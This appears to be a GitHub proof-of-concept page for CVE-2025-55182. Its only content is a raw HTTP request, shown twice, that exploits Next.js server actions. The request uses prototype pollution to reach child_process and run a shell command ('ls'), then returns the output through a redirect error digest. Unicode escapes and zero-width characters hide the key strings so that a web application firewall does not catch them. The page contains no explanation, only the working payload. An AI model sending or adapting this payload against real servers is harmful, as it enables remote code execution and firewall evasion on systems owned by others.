D0n9/CVE-2025-55182 Next.js Waf Bypass POC

## CVE-2025-55182 Next.js Waf Bypass POC
POST / HTTP/1.1
Host: localhost
User-Agent: python-requests/2.32.5
Accept-Encoding: gzip, deflate
Accept: */*
Next-Action: x
Content-Length: 1452
Content-Type: multipart/form-data; boundary=48864b92f2a7dd41cc10c2cbe428f6f3
Connection: keep-alive

--48864b92f2a7dd41cc10c2cbe428f6f3
Content-Disposition: form-data; name=0

{
    "then": "\u00240:x0",
    "x0": "\u00241\\:\u005f\u005fproto\u005f\u005f:then",
    "a": {
        "b": {
            "c": "resolved\u005fmodel"
        }
    },
    "status": "\u00240\\:a:b:c",
    "reason": 1337,
	"value": "$5:arr:1",
	"_response": "$5\u005c\u005c\u003a\u0078\u0031"
}
--48864b92f2a7dd41cc10c2cbe428f6f3
Content-Disposition: form-data; name=1

"$@0"
--48864b92f2a7dd41cc10c2cbe428f6f3
Content-Disposition: form-data; name=2

"\u00241\uFEFF\\:\u0063\u006f\u006e\u0073\u0074\u0072\u0075\u0063\u0074\u006f\u0072"

--48864b92f2a7dd41cc10c2cbe428f6f3
Content-Disposition: form-data; name=3

"\u00242\uFEFF\\:\u0063\u006f\u006e\u0073\u0074\u0072\u0075\u0063\u0074\u006f\u0072"

--48864b92f2a7dd41cc10c2cbe428f6f3
Content-Disposition: form-data; name=4

"\u00243"

--48864b92f2a7dd41cc10c2cbe428f6f3
Content-Disposition: form-data; name=5

{
    "arr": [
        "x",
        "{\"then\": \"$B0\"}",
        "xxx"
    ],
    "x1": {
        "_pref\u0069x": "var\uFEFFres=process\uFEFF.mainModule.cons\u0074ructor\uFEFF.\uFEFF_load\uFEFF('\u0063\u0068\u0069\u006c\u0064\u005f\u0070\u0072\u006f\u0063\u0065\u0073\u0073').execSync\uFEFF\uFEFF('ls');throw Object.assign(\u006e\u0065\u0077 Error('NEXT_REDIRECT'), {\uFEFFdigest:\u0060${res}\u0060});",
        "_formData": {
            "get": "\u00244"
        }
    }
}
--48864b92f2a7dd41cc10c2cbe428f6f3--
	POST / HTTP/1.1
	Host: localhost
	User-Agent: python-requests/2.32.5
	Accept-Encoding: gzip, deflate
	Accept: /
	Next-Action: x
	Content-Length: 1452
	Content-Type: multipart/form-data; boundary=48864b92f2a7dd41cc10c2cbe428f6f3
	Connection: keep-alive

	--48864b92f2a7dd41cc10c2cbe428f6f3
	Content-Disposition: form-data; name=0

	{
	"then": "\u00240:x0",
	"x0": "\u00241\\:\u005f\u005fproto\u005f\u005f:then",
	"a": {
	"b": {
	"c": "resolved\u005fmodel"
	}
	},
	"status": "\u00240\\:a:b:c",
	"reason": 1337,
	"value": "$5:arr:1",
	"_response": "$5\u005c\u005c\u003a\u0078\u0031"
	}
	--48864b92f2a7dd41cc10c2cbe428f6f3
	Content-Disposition: form-data; name=1

	"$@0"
	--48864b92f2a7dd41cc10c2cbe428f6f3
	Content-Disposition: form-data; name=2

	"\u00241\uFEFF\\:\u0063\u006f\u006e\u0073\u0074\u0072\u0075\u0063\u0074\u006f\u0072"

	--48864b92f2a7dd41cc10c2cbe428f6f3
	Content-Disposition: form-data; name=3

	"\u00242\uFEFF\\:\u0063\u006f\u006e\u0073\u0074\u0072\u0075\u0063\u0074\u006f\u0072"

	--48864b92f2a7dd41cc10c2cbe428f6f3
	Content-Disposition: form-data; name=4

	"\u00243"

	--48864b92f2a7dd41cc10c2cbe428f6f3
	Content-Disposition: form-data; name=5

	{
	"arr": [
	"x",
	"{\"then\": \"$B0\"}",
	"xxx"
	],
	"x1": {
	"_pref\u0069x": "var\uFEFFres=process\uFEFF.mainModule.cons\u0074ructor\uFEFF.\uFEFF_load\uFEFF('\u0063\u0068\u0069\u006c\u0064\u005f\u0070\u0072\u006f\u0063\u0065\u0073\u0073').execSync\uFEFF\uFEFF('ls');throw Object.assign(\u006e\u0065\u0077 Error('NEXT_REDIRECT'), {\uFEFFdigest:\u0060${res}\u0060});",
	"_formData": {
	"get": "\u00244"
	}
	}
	}
	--48864b92f2a7dd41cc10c2cbe428f6f3--
No results found